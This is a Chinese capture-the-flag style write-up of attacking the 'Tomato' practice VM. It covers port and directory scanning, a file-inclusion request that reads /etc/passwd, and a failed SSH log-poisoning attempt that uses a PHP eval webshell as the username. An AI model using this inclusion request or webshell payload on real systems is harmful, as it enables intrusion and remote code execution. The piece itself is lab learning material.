这次我们来做一做tomato这个靶场
第一步vm打开靶场不用多说
然后我们使用御剑来扫描端口访问页面
然后扫一下后台
只扫到一个,打出GG,去找攻略了
找完回来了,我只扫了目录没扫端口,回来扫个端口
还没扫完,不过有几个不常见的端口,我们看看
8888回显
但我们没有密码
查攻略X2
用kali自带的dirb又炸出来一个目录,看一看
http://192.168.177.146/antibot_image/
是个目录,点进去一看
一堆东西,随便翻一翻,头大,攻略X3
info.php的源代码中竟然又文件包含漏洞
到这里问题就简单了他是get的image参数那么我们加上参数include文件即可
http://192.168.177.146/antibot_image/antibots/info.php?image=/etc/passwd
一看能回显,哇塞,金色传说
之前扫端口看他2211开着,那就不客气了,ssh启动!
ssh '<?php @eval($_POST[tomato]);?>'@192.168.177.146 -p 2211
启动失败,显示存在无效字符,GG
上网查询,暂无解决办法GG
